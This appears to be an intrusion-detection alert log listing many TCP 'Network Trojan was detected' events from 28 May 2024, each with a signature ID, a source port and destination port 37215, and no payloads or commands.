          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800129
          SID:2835222
          Source Port:47364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794728
          SID:2835222
          Source Port:60004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594092
          SID:2835222
          Source Port:39262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745831
          SID:2829579
          Source Port:39602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190442
          SID:2835222
          Source Port:46658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075881
          SID:2829579
          Source Port:33750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597726
          SID:2835222
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980669
          SID:2835222
          Source Port:37014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848530
          SID:2835222
          Source Port:51752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352507
          SID:2835222
          Source Port:44944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213308
          SID:2829579
          Source Port:38450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943386
          SID:2829579
          Source Port:48704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.433687
          SID:2829579
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142605
          SID:2829579
          Source Port:34150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849177
          SID:2829579
          Source Port:40872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478315
          SID:2829579
          Source Port:59210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334190
          SID:2835222
          Source Port:60616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665597
          SID:2835222
          Source Port:60608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.094003
          SID:2835222
          Source Port:60640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963939
          SID:2829579
          Source Port:36712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285991
          SID:2829579
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804628
          SID:2829579
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623151
          SID:2835222
          Source Port:59098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845497
          SID:2829579
          Source Port:59076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680201
          SID:2829579
          Source Port:57948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774007
          SID:2835222
          Source Port:53340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298306
          SID:2829579
          Source Port:40214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724116
          SID:2835222
          Source Port:41528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608793
          SID:2829579
          Source Port:34646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737943
          SID:2829579
          Source Port:33500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152117
          SID:2829579
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426618
          SID:2835222
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480322
          SID:2829579
          Source Port:40610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414731
          SID:2829579
          Source Port:38972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156186
          SID:2835222
          Source Port:42018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324173
          SID:2829579
          Source Port:56698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.446630
          SID:2829579
          Source Port:53886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465253
          SID:2829579
          Source Port:41220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650671
          SID:2835222
          Source Port:51440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755942
          SID:2829579
          Source Port:52208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.113006
          SID:2829579
          Source Port:54464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551314
          SID:2835222
          Source Port:37366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923098
          SID:2835222
          Source Port:56354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301112
          SID:2835222
          Source Port:53900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614144
          SID:2829579
          Source Port:39628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739472
          SID:2835222
          Source Port:40454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265707
          SID:2835222
          Source Port:55542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229924
          SID:2835222
          Source Port:48958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.554195
          SID:2835222
          Source Port:46604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245206
          SID:2829579
          Source Port:40678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963150
          SID:2835222
          Source Port:34904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154185
          SID:2835222
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210728
          SID:2835222
          Source Port:52232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201937
          SID:2835222
          Source Port:37624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797892
          SID:2835222
          Source Port:51610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685021
          SID:2835222
          Source Port:43408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772345
          SID:2835222
          Source Port:37122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988649
          SID:2829579
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806827
          SID:2829579
          Source Port:42380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278298
          SID:2835222
          Source Port:59538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668229
          SID:2835222
          Source Port:48822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272775
          SID:2829579
          Source Port:38622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678642
          SID:2835222
          Source Port:36468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150782
          SID:2835222
          Source Port:43234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160355
          SID:2835222
          Source Port:42550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116616
          SID:2835222
          Source Port:43512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709221
          SID:2829579
          Source Port:59180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547860
          SID:2835222
          Source Port:49012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.620380
          SID:2829579
          Source Port:42560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.589097
          SID:2829579
          Source Port:50860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742327
          SID:2829579
          Source Port:43082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594571
          SID:2835222
          Source Port:36852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232920
          SID:2829579
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178156
          SID:2835222
          Source Port:59494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283499
          SID:2835222
          Source Port:45150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839826
          SID:2835222
          Source Port:60438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756159
          SID:2835222
          Source Port:35634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813195
          SID:2829579
          Source Port:54796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161468
          SID:2835222
          Source Port:39730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959901
          SID:2829579
          Source Port:34710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804896
          SID:2835222
          Source Port:57720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973988
          SID:2829579
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978237
          SID:2835222
          Source Port:59920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549351
          SID:2829579
          Source Port:54038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033971
          SID:2835222
          Source Port:36562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656235
          SID:2829579
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.281930
          SID:2829579
          Source Port:53870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.617559
          SID:2835222
          Source Port:60810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.940961
          SID:2835222
          Source Port:39426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.731133
          SID:2829579
          Source Port:37868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.856263
          SID:2835222
          Source Port:45732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341801
          SID:2835222
          Source Port:43438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.617171
          SID:2835222
          Source Port:40210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061113
          SID:2829579
          Source Port:37012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689855
          SID:2829579
          Source Port:50978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.129949
          SID:2835222
          Source Port:36894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698196
          SID:2829579
          Source Port:37608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609174
          SID:2835222
          Source Port:43112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876544
          SID:2829579
          Source Port:55244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810506
          SID:2835222
          Source Port:54348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608844
          SID:2835222
          Source Port:59064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337993
          SID:2835222
          Source Port:33762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691538
          SID:2835222
          Source Port:42164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.126847
          SID:2829579
          Source Port:33244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662928
          SID:2829579
          Source Port:43516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324212
          SID:2829579
          Source Port:49610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485320
          SID:2835222
          Source Port:52512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361573
          SID:2835222
          Source Port:56230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369432
          SID:2829579
          Source Port:44654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399823
          SID:2835222
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736000
          SID:2835222
          Source Port:37282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.130704
          SID:2829579
          Source Port:37332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.595300
          SID:2829579
          Source Port:55154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195756
          SID:2835222
          Source Port:59580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939236
          SID:2835222
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760514
          SID:2835222
          Source Port:59582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337863
          SID:2835222
          Source Port:43602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480775
          SID:2829579
          Source Port:54496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680319
          SID:2829579
          Source Port:50466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841431
          SID:2829579
          Source Port:60278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861008
          SID:2829579
          Source Port:49284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202694
          SID:2829579
          Source Port:44084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944940
          SID:2835222
          Source Port:46736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163857
          SID:2835222
          Source Port:38914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190422
          SID:2835222
          Source Port:56690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402592
          SID:2829579
          Source Port:40636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.913546
          SID:2835222
          Source Port:57924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845732
          SID:2829579
          Source Port:56370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744706
          SID:2835222
          Source Port:59078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.683328
          SID:2829579
          Source Port:53078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.805533
          SID:2835222
          Source Port:43572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543073
          SID:2829579
          Source Port:52410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630812
          SID:2829579
          Source Port:47342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922727
          SID:2835222
          Source Port:49590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605997
          SID:2829579
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230033
          SID:2829579
          Source Port:54914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551176
          SID:2829579
          Source Port:36918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712197
          SID:2829579
          Source Port:33750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.049058
          SID:2835222
          Source Port:47356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794383
          SID:2829579
          Source Port:52828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722515
          SID:2835222
          Source Port:36926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126831
          SID:2829579
          Source Port:59926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977562
          SID:2835222
          Source Port:48112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738334
          SID:2835222
          Source Port:41970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267984
          SID:2835222
          Source Port:44904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953563
          SID:2829579
          Source Port:40036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923028
          SID:2829579
          Source Port:50774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124521
          SID:2835222
          Source Port:41040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497817
          SID:2829579
          Source Port:52258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.418983
          SID:2829579
          Source Port:48506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144993
          SID:2835222
          Source Port:57068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291824
          SID:2835222
          Source Port:60252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195157
          SID:2829579
          Source Port:51974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764092
          SID:2835222
          Source Port:35008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176420
          SID:2835222
          Source Port:41130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.281992
          SID:2835222
          Source Port:38400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271196
          SID:2829579
          Source Port:36874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188117
          SID:2835222
          Source Port:51930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114131
          SID:2829579
          Source Port:52230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478224
          SID:2829579
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764461
          SID:2835222
          Source Port:46316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266586
          SID:2835222
          Source Port:35462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809947
          SID:2829579
          Source Port:37938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510280
          SID:2829579
          Source Port:43492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.995702
          SID:2829579
          Source Port:44462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431411
          SID:2829579
          Source Port:45304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668253
          SID:2835222
          Source Port:51412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664127
          SID:2829579
          Source Port:50730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822549
          SID:2829579
          Source Port:43314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157515
          SID:2835222
          Source Port:37826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.796828
          SID:2835222
          Source Port:35206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265707
          SID:2835222
          Source Port:52552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598881
          SID:2835222
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.534677
          SID:2835222
          Source Port:47074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232902
          SID:2829579
          Source Port:43878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321023
          SID:2829579
          Source Port:39724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369094
          SID:2829579
          Source Port:55876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679689
          SID:2829579
          Source Port:55610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183061
          SID:2835222
          Source Port:51788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876444
          SID:2829579
          Source Port:45032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989084
          SID:2829579
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530324
          SID:2835222
          Source Port:44918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549328
          SID:2829579
          Source Port:56328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755711
          SID:2835222
          Source Port:39140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295242
          SID:2829579
          Source Port:47574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483012
          SID:2835222
          Source Port:58802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369127
          SID:2829579
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.701297
          SID:2829579
          Source Port:41346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914243
          SID:2835222
          Source Port:57416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561870
          SID:2835222
          Source Port:59838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741856
          SID:2829579
          Source Port:39416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.738504
          SID:2829579
          Source Port:56794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650311
          SID:2835222
          Source Port:55342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877817
          SID:2835222
          Source Port:41386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618379
          SID:2835222
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891764
          SID:2835222
          Source Port:50666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938742
          SID:2835222
          Source Port:54356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
